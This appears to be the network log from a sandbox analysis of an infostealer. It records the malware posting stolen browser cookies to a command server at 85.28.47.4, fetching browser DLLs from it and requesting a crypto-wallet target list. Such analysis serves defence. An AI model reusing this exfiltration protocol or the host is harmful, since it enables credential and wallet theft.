02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Jul 2, 2024 00:05:26.008389950 CEST	224	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Jul 2, 2024 00:05:26.008403063 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 2, 2024 00:05:26.008433104 CEST	1236	IN	Data Raw: ff 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 51 f6 0a 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 2a f6 0a 00 83 ec 0c 89 7c 24 08 c7 44 24 04 00 00 00 00 89 34 24 e8 73 fc ff ff 83 ec 0c e9 d9 fe ff ff 89 7c 24 08 c7 44 24 Data Ascii: \|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$'aT$$tL$(D$ M&T$T$U=xgat9$pa\|aQtD$pa$aRR
Jul 2, 2024 00:05:26.008445978 CEST	1236	IN	Data Raw: 80 75 11 8d 4b 01 c1 e2 06 89 08 8a 0b 83 e1 3f 01 ca eb e3 83 fa 7f 76 22 89 d0 25 00 f8 ff ff 3d 00 d8 00 00 74 14 89 d0 83 e0 fe 3d fe ff 00 00 b8 fd ff 00 00 0f 44 d0 eb 05 ba fd ff 00 00 89 d0 5b 5d c3 89 d0 c3 55 89 c1 01 d0 85 d2 ba ff ff Data Ascii: uK?v"%=t=D[]USI1t9sAvuA@[] gatU$1UttA$Q]tMay?U[]DWVS~8u:TuT0A
Jul 2, 2024 00:05:27.940113068 CEST	948	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBF Host: 85.28.47.4 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 64 66 35 35 65 36 30 39 32 62 64 64 38 62 37 37 62 34 34 61 37 38 37 30 63 39 66 36 65 62 36 32 37 61 38 63 39 39 37 63 30 37 30 35 32 65 35 37 31 62 36 34 34 37 39 30 61 63 32 38 31 64 37 30 66 31 37 36 64 64 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="token"a4df55e6092bdd8b77b44a7870c9f6eb627a8c997c07052e571b644790ac281d70f176dd------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3LWdUY1dxSHZadlpiYWZPcGtxUnkwZEx5WUc5QWpQMnZiVUJvbWFybmM5cGNaVmxoSGtVZVVhV011ckQwR0dYeVcwNV9CXzFJeVVOWUVFTG15cVJnCi5nb29nbGUuY29tCVRSVUUJLwlGQUxTRQkxNjk5MDcxNjQwCTFQX0pBUgkyMDIzLTEwLTA1LTA2Cg==------HCAAEBKEGHJKEBFHJDBF--
Jul 2, 2024 00:05:28.666759014 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 2, 2024 00:05:28.972409010 CEST	556	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFH Host: 85.28.47.4 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 64 66 35 35 65 36 30 39 32 62 64 64 38 62 37 37 62 34 34 61 37 38 37 30 63 39 66 36 65 62 36 32 37 61 38 63 39 39 37 63 30 37 30 35 32 65 35 37 31 62 36 34 34 37 39 30 61 63 32 38 31 64 37 30 66 31 37 36 64 64 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 4b 45 42 41 41 45 42 47 43 41 41 45 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 [TRUNCATED] Data Ascii: ------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="token"a4df55e6092bdd8b77b44a7870c9f6eb627a8c997c07052e571b644790ac281d70f176dd------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------GIEHJKEBAAEBGCAAEBFHContent-Disposition: form-data; name="file"------GIEHJKEBAAEBGCAAEBFH--
Jul 2, 2024 00:05:29.680691004 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 2, 2024 00:05:32.296149969 CEST	556	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCGDGIDGIJKKEBGDAECA Host: 85.28.47.4 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 47 44 47 49 44 47 49 4a 4b 4b 45 42 47 44 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 64 66 35 35 65 36 30 39 32 62 64 64 38 62 37 37 62 34 34 61 37 38 37 30 63 39 66 36 65 62 36 32 37 61 38 63 39 39 37 63 30 37 30 35 32 65 35 37 31 62 36 34 34 37 39 30 61 63 32 38 31 64 37 30 66 31 37 36 64 64 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 44 47 49 44 47 49 4a 4b 4b 45 42 47 44 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 44 47 49 44 47 49 4a 4b 4b 45 42 47 44 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 [TRUNCATED] Data Ascii: ------HCGDGIDGIJKKEBGDAECAContent-Disposition: form-data; name="token"a4df55e6092bdd8b77b44a7870c9f6eb627a8c997c07052e571b644790ac281d70f176dd------HCGDGIDGIJKKEBGDAECAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------HCGDGIDGIJKKEBGDAECAContent-Disposition: form-data; name="file"------HCGDGIDGIJKKEBGDAECA--
Jul 2, 2024 00:05:33.015608072 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 2, 2024 00:05:33.662961960 CEST	89	OUT	GET /69934896f997d5bb/freebl3.dll HTTP/1.1 Host: 85.28.47.4 Cache-Control: no-cache
Jul 2, 2024 00:05:33.847292900 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:33 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "a7550-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Jul 2, 2024 00:05:34.805964947 CEST	89	OUT	GET /69934896f997d5bb/mozglue.dll HTTP/1.1 Host: 85.28.47.4 Cache-Control: no-cache
Jul 2, 2024 00:05:34.986018896 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:34 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "94750-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Jul 2, 2024 00:05:35.506882906 CEST	90	OUT	GET /69934896f997d5bb/msvcp140.dll HTTP/1.1 Host: 85.28.47.4 Cache-Control: no-cache
Jul 2, 2024 00:05:35.687957048 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:35 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "6dde8-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Jul 2, 2024 00:05:36.202606916 CEST	86	OUT	GET /69934896f997d5bb/nss3.dll HTTP/1.1 Host: 85.28.47.4 Cache-Control: no-cache
Jul 2, 2024 00:05:36.382677078 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:36 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "1f3950-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Jul 2, 2024 00:05:37.873238087 CEST	90	OUT	GET /69934896f997d5bb/softokn3.dll HTTP/1.1 Host: 85.28.47.4 Cache-Control: no-cache
Jul 2, 2024 00:05:38.195084095 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:38 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "3ef50-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Jul 2, 2024 00:05:38.444767952 CEST	94	OUT	GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1 Host: 85.28.47.4 Cache-Control: no-cache
Jul 2, 2024 00:05:38.627094030 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:38 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "13bf0-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Jul 2, 2024 00:05:39.840487003 CEST	197	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKJEHCAKFBGDGCAAAFBG Host: 85.28.47.4 Content-Length: 947 Connection: Keep-Alive Cache-Control: no-cache
Jul 2, 2024 00:05:40.543965101 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=85 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 2, 2024 00:05:40.910067081 CEST	464	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFBAECBAEGDGDHIEHIJJ Host: 85.28.47.4 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 64 66 35 35 65 36 30 39 32 62 64 64 38 62 37 37 62 34 34 61 37 38 37 30 63 39 66 36 65 62 36 32 37 61 38 63 39 39 37 63 30 37 30 35 32 65 35 37 31 62 36 34 34 37 39 30 61 63 32 38 31 64 37 30 66 31 37 36 64 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 41 45 43 42 41 45 47 44 47 44 48 49 45 48 49 4a 4a 2d 2d 0d 0a Data Ascii: ------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="token"a4df55e6092bdd8b77b44a7870c9f6eb627a8c997c07052e571b644790ac281d70f176dd------KFBAECBAEGDGDHIEHIJJContent-Disposition: form-data; name="message"wallets------KFBAECBAEGDGDHIEHIJJ--
Jul 2, 2024 00:05:41.091006994 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:41 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: 